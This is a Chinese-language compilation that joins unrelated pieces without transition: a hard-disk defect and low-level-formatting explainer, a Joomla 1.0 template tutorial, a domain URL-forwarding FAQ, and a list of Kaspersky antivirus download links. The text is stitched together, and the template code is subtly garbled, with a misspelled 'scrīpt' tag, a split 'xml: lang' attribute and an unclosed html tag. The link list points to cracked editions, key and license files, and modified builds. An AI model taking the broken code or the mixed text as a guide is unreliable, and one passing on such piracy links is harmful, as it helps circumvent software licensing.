很遗憾，我没有找到教我修复硬盘的老师，也不认为那本教科书对我修硬盘有太大帮助。
 
在研究硬盘修复和使用专业软件修复硬盘的过程中，必将涉及到一些基本的概念。在这里，高朋根据自己的研究和实践经验，试图总结并解释一些与"硬盘缺陷"相关的概念，与众位读者交流。
 
Bad sector(坏扇区) 在硬盘中无法被正常访问或不能被正确读写的扇区都称为Bad sector。一个扇区能存储512Bytes的数据，如果在某个扇区中有任何一个字节不能被正确读写，则这个扇区为Bad sector。除了存储512Bytes外，每个扇区还有数十个Bytes信息，包括标识（ID）、校验值和其它信息。这些信息任何一个字节出错都会导致该扇区变"Bad"。例如，在低级格式化的过程中每个扇区都分配有一个编号，写在ID中。如果ID部分出错就会导致这个扇区无法被访问到，则这个扇区属于Bad sector。有一些Bad sector能够通过低级格式化重写这些信息来纠正。
 
Bad cluster 坏簇 在用户对硬盘分区并进行高级格式化后，每个区都会建立文件分配表（File Allocation Table, FAT)。FAT中记录有该区内所有cluster（簇）的使用情况和相互的链接关系。如果在高级格式化（或工具软件的扫描）过程中发现某个cluster使用的扇区包括有坏扇区，则在FAT中记录该cluster为Bad cluster，并在以后存放文件时不再使用该cluster,以避免数据丢失。有时病毒或恶意软件也可能在FAT中将无坏扇区的正常cluster标记为Bad cluster, 导致正常cluster不能被使用。 这里需要强调的是，每个cluster包括若干个扇区，只要其中存在一个坏扇区，则整个cluster中的其余扇区都一起不再被使用.
 
Defect(缺陷) 在硬盘内部中所有存在缺陷的部分都被称为Defect。 如果某个磁头状态不好，则这个磁头为Defect head。 如果盘面上某个Track(磁道)不能被正常访问，则这Track为Defect Track. 如果某个扇区不能被正常访问或不能正确记录数据，则该扇区也称为Defect Sector. 可以认为Bad sector 等同于 Defect sector. 从总的来说，某个硬盘只要有一部分存在缺陷，就称这个硬盘为Defect hard disk.
 
P-list(永久缺陷表) 现在的硬盘密度越来越高，单张盘片上存储的数据量超过40Gbytes. 硬盘厂家在生产盘片过程极其精密，但也极难做到100%的完美，硬盘盘面上或多或少存在一些缺陷。厂家在硬盘出厂前把所有的硬盘都进行低级格式化，在低级格式化过程中将自动找出所有defect track和defect sector，记录在P-list中。并且在对所有磁道和扇区的编号过程中，将skip（跳过）这些缺陷部分，让用户永远不能用到它们。这样，用户在分区、格式化、检查刚购买的新硬盘时，很难发现有问题。一般的硬盘都在P-list中记录有一定数量的defect, 少则数百，多则数以万计。如果是SCSI硬盘的话可以找到多种通用软件查看到P-list，因为各种牌子的SCSI硬盘使用兼容的SCSI指令集。而不同牌子不同型号的IDE硬盘，使用各自不同的指令集，想查看其P-list要用针对性的专业软件。
 
G-list（增长缺陷表) 用户在使用硬盘过程中，有可能会发现一些新的defect sector。 按"三包"规定，只要出现一个defect sector，商家就应该为用户换或修。现在大容量的硬盘出现一个defect sector概率实在很大，这样的话硬盘商家就要为售后服务忙碌不已了。于是，硬盘厂商设计了一个自动修复机制，叫做Automatic Reallcation。有大多数型号的硬盘都有这样的功能：在对硬盘的读写过程中，如果发现一个defect sector，则自动分配一个备用扇区替换该扇区，并将该扇区及其替换情况记录在G-list中。这样一来，少量的defect sector对用户的使用没有太大的影响。
 
也有一些电脑硬盘自动修复机制的激发条件要严格一些，需要用某些软件来判断defect sector,并通过某个端口（据说是50h）调用自动修复机制。比如常用的Lformat, ADM，DM中的Zero fill，Norton中的Wipeinfo和校正工具，西数工具包中的wddiag, IBM的DFT中的Erase等。这些工具之所以能在运行过后消除了一些"坏道"，很重要的原因就在这Automatic Reallcation（当然还有其它原因），而不能简单地概括这些"坏道"是什么"逻辑坏道"或"假坏道"。 如果哪位被误导中毒太深的读者不相信这个事实，等他找到能查看G-list的专业工具后就知道，这些工具运行过后，G-list将会增加多少记录！"逻辑坏道"或"假坏道"有必要记录在G-list中并用其它扇区替换么？
 
当然，G-list的记录不会无限制，所有的硬盘都会限定在一定数量范围内。如火球系列限度是500，美钻二代的限度是636，西数BB的限度是508，等等。超过限度，Automatic Reallcation就不能再起作用。这就是为何少量的"坏道"可以通过上述工具修复（有人就概括为："逻辑坏道"可以修复），而坏道多了不能通过这些工具修复（又有人概括为："物理坏道"不可以修复）。
 
Bad track (坏道）这个概念源于十多年前小容量硬盘（100M以下），当时的硬盘在外壳上都贴有一张小表格，上面列出该硬盘中有缺陷的磁道位置（新硬盘也有）。在对这个硬盘进行低级格式化时（如用ADM或DM 5.0等工具,或主板中的低格工具），需要填入这些Bad track的位置, 以便在低格过程中跳过这些磁道。现在的大容量硬盘在结构上与那些小容量硬盘相差极大，这个概念用在大容量硬盘上有点牵强。
 
读者们还可能发现国内很多刊物和网上文章中还有这么几个概念：物理坏道，逻辑坏道，真坏道，假坏道，硬坏道，软坏道等。高朋在国外的硬盘技术资料中没有找到对应的英文概念，也许是ZhongGuo人自己概括的吧？既然有那么多的人能接受这些概念，也许某些专家能作出一些的合理解释。 高朋不习惯使用这些概念，不想对它们作牵强的解释，读者们看看是谁说的就去问谁吧。
 
正常情况下，硬盘在接通电源之后，都要进行"初始化"过程（也可以称为"自检"）。这时，会发出一阵子自检声音，这些声音长短和规律视不同牌子硬盘而各不一样，但同型号的正常硬盘的自检声音是一样的。 有经验的人都知道，这些自检声音是由于硬盘内部的磁头寻道及归位动作而发出的。为什么电脑硬盘刚通电就需要执行这么多动作呢？简单地说，是硬盘在读取的记录在盘片中的初始化参数。
 
一般熟悉硬盘的人都知道，硬盘有一系列基本参数，包括：牌子、型号、容量、柱面数、磁头数、每磁道扇区数、系列号、缓存大小、转速、S.M.A.R.T值等。其中一部分参数就写在硬盘的标签上，有些则要通过软件才能测出来。但是，高朋告诉你，这些参数仅仅是初始化参数的一小部分，盘片中记录的初始化参数有数十甚至数百个！硬盘的CPU在通电后自动寻找BIOS中的启动程序，然后根据启动程序的要求，依次在盘片中指定的位置读取相应的参数。如果某一项重要参数找不到或出错，启动程序无法完成启动过程，硬盘就进入保护模式。在保护模式下，用户可能看不到硬盘的型号与容量等参数，或者无法进入任何读写操作。近来有些系列的硬盘就是这个原因而出现类似的通病，如：FUJITSU MPG系列自检声正常却不认盘，MAXTOR美钻系列认不出正确型号及自检后停转，WD BB EB系列能正常认盘却拒绝读写操作等。
 
不同牌子不同型号的硬盘有不同的初始化参数集，以较熟悉的Fujitsu硬盘为例，高朋简要地讲解其中一部分参数，以便读者理解内部初始化参数的原理。
 
通过专用的程序控制硬盘的CPU，根据BIOS程序的需要，依次读出初始化参数集，按模块分别存放为69个不同的文件，文件名也与BIOS程序中调用到的参数名称一致。其中部分参数模块的简要说明如下：
 
DM硬盘内部的基本管理程序
 
- PL永久缺陷表
- TS缺陷磁道表
- HS实际物理磁头数及排列顺序
- SM最高级加密状态及密码
- SU用户级加密状态及密码
- CI 硬件信息，包括所用的CPU型号，BIOS版本，磁头种类，磁盘碟片种类等
- FI生产厂家信息
- WE写错误记录表
- RE读错误记录表
- SI容量设定，指定允许用户使用的最大容量（MAX LBA），转换为外部逻辑磁头数(一般为16)和逻辑每磁道扇区数（一般为63）
- ZP区域分配信息，将每面盘片划分为十五个区域，各个区域上分配的不同的扇区数量，从而计算出最大的物理容量。
 
这些参数一般存放在普通用户访问不到的位置,有些是在物理零磁道以前,可以认为是在负磁道的位置。可能每个参数占用一个模块，也可能几个参数占用同一模块。模块大小不一样，有些模块才一个字节，有些则达到64K字节。这些参数并不是连续存放的，而是各有各的固定位置。
 
读出内部初始化参数表后，就可以分析出每个模块是否处于正常状态。当然，也可以修正这些参数，重新写回盘片中指定的位置。这样，就可以把一些因为参数错乱而无法正常使用的硬盘"修复"回正常状态。
 
如果读者有兴趣进一步研究，不妨将电脑硬盘电路板上的ROM芯片取下，用写码机读出其中的BIOS程序，可以在程序段中找到以上所列出的参数名称
熟悉硬盘的人都知道，在必要的时候需要对硬盘做"低级格式化"（下面简称"低格"）。进行低格所使用的工具也有多种：有用厂家专用设备做的低格，有用厂家提供的软件工具做的低格，有用DM工具做的低格，有用主板BIOS中的工具做的低格，有用Debug工具做的低格，还有用专业软件做低格......
 
 
不同的工具所做的低格对硬盘的作用各不一样。有些人觉得低格可以修复一部分硬盘，有些人则觉得低格十分危险，会严重损害硬盘。高朋用过多种低格工具，认为低格是修复硬盘的一个有效手段。下面总结一些关于低格的看法，与广大网友交流。
 
大家关心的一个问题："低格过程到底对硬盘进行了什么操作？"实践表明低格过程有可能进行下列几项工作，不同的硬盘的低格过程相差很大，不同的软件的低格过程也相差很大。
 
A. 对扇区清零和重写校验值。低格过程中将每个扇区的所有字节全部置零，并将每个扇区的校验值也写回初始值，这样可以将部分缺陷纠正过来。譬如，由于扇区数据与该扇区的校验值不对应，通常就被报告为校验错误（ECC Error）。如果并非由于磁介质损伤，清零后就很有可能将扇区数据与该扇区的校验值重新对应起来，而达到"修复"该扇区的功效。这是每种低格工具和每种硬盘的低格过程最基本的操作内容，同时这也是为什么通过低格能"修复大量坏道"的基本原因。另外，DM中的Zero Fill（清零）操作与IBM DFT工具中的Erase操作，也有同样的功效。
 
B. 对扇区的标识信息重写。在多年以前使用的老式硬盘（如采用ST506接口的硬盘），需要在低格过程中重写每个扇区的标识（ID）信息和某些保留磁道的其他一些信息，当时低格工具都必须有这样的功能。但现在的硬盘结构已经大不一样，如果再使用多年前的工具来做低格会导致许多令人痛苦的意外。难怪经常有人在痛苦地高呼："危险！切勿低格硬盘！我的硬盘已经毁于低格！"
 
C. 对扇区进行读写检查，并尝试替换缺陷扇区。有些低格工具会对每个扇区进行读写检查，如果发现在读过程或写过程出错，就认为该扇区为缺陷扇区。然后，调用通用的自动替换扇区（Automatic reallocation sector）指令，尝试对该扇区进行替换，也可以达到"修复"的功效。
 
D. 对所有物理扇区进行重新编号。编号的依据是P-list中的记录及区段分配参数（该参数决定各个磁道划分的扇区数），经过编号后，每个扇区都分配到一个特定的标识信息（ID）。编号时，会自动跳过P-list中所记录的缺陷扇区，使用户无法访问到那些缺陷扇区（用户不必在乎永远用不到的地方的好坏）。如果这个过程半途而废，有可能导致部分甚至所有扇区被报告为标识不对（Sector ID not found, IDNF）。要特别注意的是，这个编号过程是根据真正的物理参数来进行的，如果某些低格工具按逻辑参数（以 16heads 63sector为最典型）来进行低格，是不可能进行这样的操作。
 
E. 写磁道伺服信息，对所有磁道进行重新编号。有些硬盘允许将每个磁道的伺服信息重写，并给磁道重新赋予一个编号。编号依据P-list或TS记录来跳过缺陷磁道（defect track）,使用户无法访问（即永远不必使用）这些缺陷磁道。这个操作也是根据真正的物理参数来进行。
 
F. 写状态参数，并修改特定参数。有些硬盘会有一个状态参数，记录着低格过程是否正常结束，如果不是正常结束低格，会导致整个硬盘拒绝读写操作，这个参数以富士通IDE硬盘和希捷SCSI硬盘为典型。有些硬盘还可能根据低格过程的记录改写某些参数。
 
下面我们来看看一些低格工具做了些什么操作：
 
1. DM中的Low level format：进行了A和B操作。速度较快，极少损坏硬盘，但修复效果不明显。
 
2. Lformat：进行了A、B、C操作。由于同时进行了读写检查，操作速度较慢，可以替换部分缺陷扇区。但其使用的是逻辑参数，所以不可能进行D、E和F的操作。遇到IDNF错误或伺服错误时很难通过，半途会中断。
 
3. SCSI卡中的低格工具：由于大部SCSI硬盘指令集通用，该工具可以对部分SCSI硬盘进行A、B、C、D、F操作，对一部分SCSI硬盘（如希捷）修复作用明显。遇到缺陷磁道无法通过。同时也由于自动替换功能，检查到的缺陷数量超过G-list限度时将半途结束，硬盘进入拒绝读写状态。
 
4. 专业的低格工具：一般进行A、B、D、E、F操作。通常配合伺服测试功能（找出缺陷磁道记入TS），介质测试功能（找出缺陷扇区记入P-list），使用的是厂家设定的低格程序（通常存放在BIOS或某一个特定参数模块中），自动调用相关参数进行低格。一般不对缺陷扇区进行替换操作。低格完成后会将许多性能参数设定为刚出厂的状态。
 
在这里, 高朋顺便回答一些读者常重复问到的问题：
 
问1：低格能不能修复硬盘？
答：合适的低格工具能在很大程度上修复硬盘缺陷。
问2：低格会不会损伤硬盘？
答：正确的低格过程绝不会在物理上损伤硬盘。用不正确的低格工具则可能严重破坏硬盘的信息，而导致硬盘不能正常使用。
问3：什么时候需要对硬盘进行低格？
答：在修改硬盘的某些参数后必须进行低格，如添加P-list记录或TS记录，调整区段参数，调整磁头排列等。另外, 每个用户都可以用适当低格工具修复硬盘缺陷，注意：必须是适当的低格工具。
问4：什么样的低格工具才可以称为专业低格工具？
答：能调用特定型号的记录在硬盘内部的厂家低格程序，并能调用到正确参数集对硬盘进行低格，这样的低格工具均可称为专业低格工具。

一、语义标记
先看一个Joomla模板的index.php的空白body（head部分从略），都包含了哪些信息可供我们分析：

<body> <!-- 1 --><?php echo $mosConfig_sitename;?> <!-- 2 --><?php mospathway()?> <!-- 3 --><?php mosLoadModules('top');?> <!-- 4 --><?php mosLoadModules('left');?> <!-- 5 --><?php mosMainBody();?> <!-- 6 --><?php mosLoadModules('right');?> <!-- 7 --><?php include_once( $mosConfig_absolute_path .'/includes/footer.php' );?> </body> </html>

逻辑顺序一目了然：

1. name of the site 网站名称
2. the pathway 模块路径
3. top module 顶部模块
4. left modules 左侧模块
5. main content 主要内容
6. right modules 右侧模块
7. the default footer module 默认的底部模块

这就是一个结构化的语义标记(semantic markup)的典型例子。它的目的十分单纯和明确：让任何人在浏览器端可以阅读网页的内容，让任何浏览器都没有障碍地展现网页的全部内容，让任何网页阅读装置如网络蜘蛛都可以准确地抓取网页信息。语义标记是奠定网站亲和度(accessibility)的基石。

有了这样一个结构化的语义标记逻辑框架并不等于大功告成。Joomla!的模板世界丰富多彩，变幻诡谲。这些层出不穷的主题都不是由一个模子刻出来的。世界上也没有哪个设计师能把大千世界镶嵌进一个千篇一律的模板里。每诞生一个新主题，第一件要做的事情，就是跑到W3C的官方网站去验证网页代码(xml和css)的合法性。

二、CSS布局

我们打算用CSS来谋划一个三栏布局的Joomla模板，而且这个三栏布局是可变宽窄的(fluid)。页面的宽窄布局迄今有两种主要的模式，一种是固定宽窄(fixed)，还有一种就是可变宽窄。这两种布局模式都是控制页面宽度的。

页面的宽窄一直是困扰设计师的问题。由于人们使用不同分辨率的浏览器，在设计页面时不得不考虑分辨率和人们的浏览习惯等因素。大约20%的冲浪者使用800X600分辨率，这个数字正在下降。76%的人使用1024X768分辨率，这是主流趋势(数据来源：www.upsdell.com)。采用可变宽窄的页面布局意味着你的网页既不会在1024分辨率下变得很窄，同时也可以在低分辨率的显示器上获得完美展现。

我们用float来给内容定位。下面是template_css.css文件的内容：

<?php defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' ); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="<?php echo _LANGUAGE; ?>" xml: lang="<?php echo _LANGUAGE; ?>" <head> <meta http-equiv="Content-Type" content="text/html; <?php echo _ISO; ?>" /> <?php if ($my->id) { initEditor(); } ?> <?php mosShowHead(); ?> <scrīpt type="text/javascrīpt"> </scrīpt> <!--http://www.bluerobot.com/web/css/fouc.asp--> <link href="templates/<?php echo $cur_template; ?>/css/template_css.css" rel="stylesheet" type="text/css" media="screen" /> <style type="text/css"> <!-- #wrap {width:80%;} #header {} #sidebar {float:left;width:20%;} #content {float:left;width:60%;} #sidebar-2 {float:left;width:20%;} #footer {clear:both;} --> </style> </head> <body> <div id="wrap"> <div id="header"> <?php echo $mosConfig_sitename; ?> <?php mospathway() ?> </div> <div id="sidebar"> <?php mosLoadModules('left');?> </div> <div id="content"> <?php mosLoadModules('top');?> <?php mosMainBody(); ?> </div> <div id="sidebar-2"> <?php mosLoadModules('right');?> </div> <div id="footer"> <?php include_once( $mosConfig_absolute_path .'/includes/footer.php');?> </div> </div> <!--end of wrap--> </body> </html>

Joomla模板默认的层叠样式表(Cascading Style Sheet,简称CSS)是template_css.css文件，它统领全局，是网页整体布局的灵魂。CSS将所有的元素视为一个盒子(box)，由內容(content)、留白(padding)、外框(border)与边界(margin)所组成。在此例中，全部内容都被装填到一个叫“盒子”或“元素”的容器中。


Joomla中的CSS图示：


摘自：Adam Li的Blog；原文出处：http://my.opera.com/adamli/blog/show.dml/427441

       一直想写一篇关于Joomla模版制作的一个通行教程，最近正好在编辑一个新模版就以此为例讲述新手如何学习和制作Joomla的模版。
       一般来说制作模版首先要有个总体观念，我们可以使用photoshop、fireworks等平面软件先整体构思一个设计方案的平面图来。以下我需要设计一个展览行业的站点，我首先用fireworks来设计了一张平面的效果图如下图：


有了一个整体的设计思路之后我们可以通过辅助线和裁减，将其完整的用HTML来显现出来，当然这时候可以不是很完美的可以仅仅作为一个框架：



当用HTML完整的实现了我们先前的设计思路之后，接下来的工作就是如何将HTML转换到JOOMLA的PHP模版中，为了让我们的工作确保无误，刚开始的时候可以打开一个JOOMLA的范例模版做比较。1.0.X版本中的rhuk_solarflare_ii模版是官方非常规范的一个模版，这时候可以打开rhuk_solarflare_ii模版文件夹中的index.php文件对照来转换我们的HTML文件模版。

这里需要说明的是JOOMLA模版文件夹中的各个文件和文件夹的用处：



CSS:                        用来存储模版的CSS文件
IMAGES:                 用来存储模版的图片文件
index.php               模版文件
template_thumbnail.png    模版的缩略图
templateDetails.xml            模版安装的XML文件

明白以上文件夹的结构，接下来要做的事情就是将原来HTML---->转换到 JOOMLA的PHP模版中，比较两个模版（HTML已经设计好的）、（rhuk_solarflare_ii）



转换步骤：
1.HTML另存为PHP，并且新建CSS文件夹，将rhuk_solarflare_ii中的CSS复制过来
2.将HTML头部代码用以下代码替换：

<?php defined( '_VALID_MOS' ) or die( 'Restricted access' ); // needed to seperate the ISO number from the language file constant _ISO $iso = explode( '=', _ISO ); // xml prolog echo '<?xml version="1.0" encoding="'. $iso[1] .'"?' .'>'; ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; <?php echo _ISO; ?>" /> <?php mosShowHead(); ?> <?php if ( $my->id ) {  initEditor(); }?> <link href="<?php echo $mosConfig_live_site;?>/templates/rhuk_solarflare_ii/css/template_css.css" rel="stylesheet" type="text/css"/> </head>

修改其中CSS的路径

3.HTML文件中的图片地址均转换为：

<?php echo $mosConfig_live_site;?>/templates/rhuk_solarflare_ii/images/advertisement.png

类似地址

4.增加模块位置，在需要的地方增加如：<?php mosLoadModules ( 'user1', -2 ); ?>、<?php mosLoadModules ( 'left', -2 ); ?>、<?php mosMainBody(); ?>等等，具体位置模块的参数含义可以参考下边的文章

5.安装模版文件调整CSS达到显示效果

参考文章：模版位置模块参数含义
                       CSS定义

写的比较匆忙，很多地方都是大概说了一下，大家看了有什么建议和补充欢迎提出来！

1、什么是URL转发？

所谓URL转发，是万网对在万网注册的域名，所提供的一项特别的域名增值服务，此服务是通过万网服务器的特殊技术设置，实现当访问您的域名时，将会自动跳转到您所指定的另一个网络地址（URL）。假设abc.com是您在万网注册的域名，则通过URL转发服务可以实现当访问http://www.abc.com时，自动转向访问另外一个URL，如：http://www.otherdomain.com/somedir/other.htm。当然请注意前提是：首先您的域名（如上：abc.com）已经通过万网成功注册，并使用万网默认的DNS服务器；其次同时您设置其转发至的目标地址（如上：http://www.otherdomain.com/somedir/other.htm）是可以在互联网正常访问到的，这样才能保证您的URL转发成功。
由此可见，URL转发服务尤其对于拥有一个主网站并同时拥有多个域名的用户比较适用，通过URL转发服务，您就可以轻松实现多个域名指向一个网站或网站子目录了；
另外，通过URL转发服务，可以方便的实现将您的中文域名，设置自动转发到您的英文域名主站点。

2、URL转发隐藏路径和不隐藏路径有何区别？

不隐藏路径URL转发：例如：http://b.com/指向http://a.com/xxx/（任意目录）；当在浏览器地址栏中敲入http://b.com/后回车，IE浏览器的地址栏里显示的地址会由原来您敲入的http://b.com/自动变为显示真正的目标地址http://a.com/xxx/；

隐藏路径的URL转发：例如：http://b.com/指向http://a.com/xxx/（任意目录）；当在浏览器地址栏中敲入http://b.com/后回车，IE浏览器的地址栏里显示的地址保持不变，仍是http://b.com/，但实际访问到的是http://a.com/xxx/的内容。

3、如何设置URL转发？

域名注册成功后，登录万网会员专区->域名管理->点击您希望设置URL转发的域名->域名解析综合服务->选择url-url记录，设置相应参数，提交确认即可，设置后一般6-12小时生效，请您耐心等待。
注：修改URL转发的目标地址，也是同样的操作方法。

4、如何取消URL转发？

如果您需要取消以前的URL转发设置而并非修改URL转发的目标地址，则只需对此域名正常的设置域名解析，原URL转发设置就自动失效。即登录万网会员专区->域名管理->点击您希望设置URL转发的域名->域名解析综合服务->选择A-A记录，填写好您希望设置的各项记录对应的IP地址，提交确认即可，设置后一般6-12小时生效，请您耐心等待。

5、URL转发生效时间是？

已经注册成功的域名，若初设或取消URL转发设置，一般均在6-12小时之内生效，请您设置完毕后耐心等待，谢谢！
对于原有已经设置成功的URL转发域名，如果修改URL转发的目标地址，则只需1个小时即可生效。

6、万网的URL转发服务器IP地址是什么？

218.30.103.84
即当域名URL转发设置成功后 该域名的www A记录和域名@ A记录（例如：www.abc.com和abc.com）都将自动设置解析至218.30.103.84
这个IP地址。

7、其他URL转发常见问题：

（1）为什么我的域名设置URL转发后，检查域名也正常解析到218.30.103.84后，但看到的是万网欢迎页面？
这是因为我公司的URL转发服务器，大约每隔一小时进行一次设置同步，所以如果是刚刚设置的URL转发，在域名解析已经生效而URL转发记录设置还未同步生效期间，有可能会访问到万网预设的欢迎页面，这属于正常现象，请您耐心等待即可，此情况不会超过1个小时。
（2）为什么我设置了URL转发后，再到万网会员专区的域名解析设置界面中，查看此域名的域名解析设置发现，域名的www A记录和域名@ A记录的指向值为空？
这是由于设置了URL转发后，该域名的www A记录和域名@ A记录（例如：www.abc.com和abc.com）都将自动设置解析至218.30.103.84这个URL转发服务器IP地址上，但是在域名解析界面不显示此IP地址，所以显示为空，属于正常情况。
（3）我能否设置子域名URL转发？（例如：bbs.abc.com转发到http://www.xyz.com/bbs/）
可以，在域名管理界面的域名解析综合服务中可以轻松设置.

卡巴斯基大全 （世界所有卡巴相关软件下载）

1.卡巴斯基(AVP) V5.227 中文单机版

卡巴斯基全新中文单机版（Kaspersky Anti-Virus Perso www.skycn.com/soft/13721.html

2.卡巴斯基反病毒软件单机 V5.0.388 简体中文版

卡巴斯基中文单机版（Kaspersky Anti-Virus Personal） www.skycn.com/soft/22713.html

3.Kaspersky Anti-Virus Personal 2006 6.0 Beta 2

卡巴斯基中文单机版（KasperskyAnti-VirusPersonal）是俄罗斯著名数据安全厂商Kaspers www.onlinedown.net/soft/40266.htm

4. Kaspersky Anti-Virus Personal Pro 简体中文版 5.0.388

卡巴斯基简体专业版 antivirus.pchome.net/avp/12889.html

5. Kaspersky Personal Security Suite 1.0.22

卡巴斯基个人安全套装 antivirus.pchome.net/avp/6941.html

6. 卡巴斯基(AVP)中文单机版 V5.227

卡巴斯基全新中文单机版（Kaspersky Anti-Virus Personal） 是俄罗斯著名数据安全 download.21cn.com/list.php?id=44815

7. 卡巴斯基反病毒软件单机 V5.0.372 简体中文版

卡巴斯基中文单机版（Kaspersky Anti-Virus Personal）是俄罗斯著名数据安全厂商K download.21cn.com/list.php?id=52533

8. Kaspersky Personal Security Suite V1.0.22

卡巴斯基个人安全套装通过监测所有感染源有效地阻止了 www.skycn.com/soft/22124.html

9. Kaspersky Personal Security Suite 1.0.22

卡巴斯基个人安全套装通过监测所有感染源有效地阻止了恶意代码的所有来源。包括文件的 www.onlinedown.net/soft/38188.htm

11. TroyanFindInfo 3.0

一个查找系统木马的小工具。由有名的俄国AntiVirus---卡巴斯基出品的工具，并不是公开 www.onlinedown.net/soft/36670.htm

12. Kaspersky Anti-Virus 6.0 beta 2

卡巴斯基中文单机版（Kaspersky Anti-Virus Personal）是俄罗斯著名数据安全厂商Kaspe dl.pconline.com.cn/html/1/7/dlid=487&dltypeid=1&pn=0&.html

13. Kaspersky Personal Security Suite 1.0.22

卡巴斯基个人安全套装通过监测所有感染源有效地阻止了恶意代码的所有来源。包括文件的 dl.pconline.com.cn/html/1/8/dlid=13568&dltypeid=1&pn=0&.html

14. Kaspersky Internet Security 6.0 Beta 2

卡巴斯基全新产品Kaspersky Internet Security 2006，很少的资源占用。更加艺术的界面 dl.pconline.com.cn/html/1/6/dlid=13616&dltypeid=1&pn=0&.html

15. 卡巴斯基反病毒软件单机 V5.0.388 简体中文版

www.ddooo.com/softdown/13886.htm

16. 卡巴斯基(Kaspersky)反病毒软件 V5.0.383 单机中文版

www.ddooo.com/softdown/4357.htm

17. 卡巴斯基(AVP) v5.0.388 专业版

www.crsky.com/soft/5630.html

18. 卡巴斯基(AVP) v5.388 中文单机版

www.crsky.com/soft/3798.html

19. 卡巴斯基反黑客软件 v1.8.180

www.crsky.com/soft/6333.html

20. 卡巴斯基反病毒软件单机 V5.0.372 简体中文版

download.winzheng.com/softview/SoftView_31650.htm

21. 卡巴斯基 v5.0.142 简体中文版

www.gbdown.com/SoftView/SoftView_609.html

22. 卡巴斯基(AVP) v5.227 中文单机版

www.gbdown.com/SoftView/SoftView_763.html

23. Kaspersky Anti-Virus Personal(卡巴斯基) v5.156

www.gbdown.com/SoftView/SoftView_651.html

24. 卡巴斯基(AVP) v5.0.20 中文专业版

www.gbdown.com/SoftView/SoftView_872.html

25. 卡巴斯基(AVP) v5.372 中文单机版

www.gbdown.com/SoftView/SoftView_1192.html

26. 卡巴斯基 V4.5绿色自动升级版[本站修改版]

soft.mumayi.net/Software/Catalog105/1430.html

27. 卡巴斯基反病毒软件单机版系列 5.0.383/5.0.372/5.0.227官方正式中文版

soft.mumayi.net/Software/Catalog101/8.html

28. 卡巴斯基防火墙 1.7130中文版

soft.mumayi.net/Software/Catalog105/66.html

29. Kaspersky Anti-Virus for Server(卡巴斯基服务器版) V4.5.0.104 汉化破解版

soft.mumayi.net/Software/Catalog101/302.html

30. 卡巴斯基 单机专业版 V5.0.372绿色全功能正式版

soft.mumayi.net/Software/Catalog101/2186.html

31. 卡巴斯基 Kaspersky 5.0 简体中文 网络版

soft.mumayi.net/Software/Catalog101/2256.html

32. 卡巴斯基(Kaspersky)V5.0.XXX全系列优化必备工具

soft.mumayi.net/Software/Catalog101/2376.html

33. 卡巴斯基(Kaspersky Internet Security) 2006 6.0.9.96 汉化版

soft.mumayi.net/Software/Catalog101/976.html

34. 卡巴斯基反病毒软件单机专业版系列 5.0.383/5.0.372/5.0.20 官方简体中文版

soft.mumayi.net/Software/Catalog101/1315.html

35. 卡巴斯基(Kaspersky) v5.0.390 Pro 纯绿色优化版

soft.mumayi.net/Software/Catalog101/2613.html

36. 卡巴斯基杀毒软件中文单机版 v5.0

www.shareware.cn/pub/4061.html

37. 卡巴斯基(AVP)反病毒软件 单机5.156 中文版

www.pcdog.com/soft/30999.htm

38. 卡巴斯基木马探测器 V3.0

www.78soft.com/soft/14449.htm

39. Kaspersky Anti-Virus(AVP) Personal(卡巴斯基) V5.0.388 简体中文单机版

www.78soft.com/soft/11993.htm

40. 卡巴斯基Kaspersky 纯DOS版 V20051202版

www.78soft.com/soft/13338.htm

41. Kaspersky Anti-Virus(AVP) Personal(卡巴斯基) V5.0.372 简体中文单机版 授权文件

www.78soft.com/soft/11967.htm

42. Kaspersky (卡巴斯基) V5.227 简体中文版

www.78soft.com/soft/5917.htm

43. Kaspersky (卡巴斯基) V5.0.156 简体中文版 授权文件

www.78soft.com/soft/5918.htm

44. Kaspersky (卡巴斯基) V4.5 服务器(企业)中文版

www.78soft.com/soft/10779.htm

45. 卡巴斯基 Key文件 + 卸载工具

www.78soft.com/soft/9210.htm

46. 卡巴斯基(AVP) V5.156 中文单机版

www.78soft.com/soft/8821.htm

47. 卡巴斯基(AVP) v5.0.142 简体中文版

www.78soft.com/soft/8784.htm

48. Kaspersky（卡巴斯基）Anti Virus Personal 5.0.383 汉化注册版

www.oamo.com/Software/Catalog144/4812.html

49. 卡巴斯基(Kaspersky)反病毒 5.0.372

www.oamo.com/Software/Catalog144/112.html

50. Kaspersky(卡巴斯基) v5.372 中文单机版

www.oamo.com/Software/Catalog144/57.html

51. Kaspersky Anti-Virus Personal Pro(卡巴斯基) 专业汉化破解版 5.0.383

www.ylmf.net/Software/Catalog45/252.html

52. 卡巴斯基(AVP) 3.5瑞士版

www.ylmf.net/Software/Catalog45/77.html

53. 卡巴斯基(AVP) v5.0.372 中文单机版

www.ylmf.net/Software/Catalog45/76.html

54. 卡巴斯基Kaspersky 2005 V10.30 (硬盘+软盘+光盘+U盘+NTFS通用)Dos版

www.ylmf.net/Software/Catalog45/1743.html

55. 卡巴斯基(Kaspersky)V5.0.XXX全系列优化必备工具

www.ylmf.net/Software/Catalog45/1582.html

56. 卡巴斯基®反病毒软件单机专业版 5.0372绿色全功能正式版

www.ylmf.net/Software/Catalog45/1507.html

57. 卡巴斯基Kaspersky 2005 V10.14 (硬盘+软盘+光盘+U盘+NTFS通用)Dos版

www.ylmf.net/Software/Catalog45/1465.html

58. 卡巴斯基的所有KEY

www.ylmf.net/Software/Catalog48/584.html

59. 卡巴斯基安全套装2006 火热汉化版

www.ylmf.net/Software/Catalog45/526.html

60. 卡巴斯基中文服务器版 4.5 [非常珍贵的版本]

www.ylmf.net/Software/Catalog45/126.html

61. 卡巴斯基反病毒软件单机专业版 5.0.20 中文版

www.ylmf.net/Software/Catalog46/88.html

62. Kaspersky Anti-Virus(AVP) Personal Pro(卡巴斯基反病毒单机专业版) V5.0.388 简体中文注册版

www.syku.net/down/soft/4857.htm

63. Kaspersky Anti-Hacker(卡巴斯基反黑客) V1.8 Build 180 简体中文注册版

www.syku.net/down/soft/4748.htm

64. 卡巴斯基反病毒官方中文版5.0.383

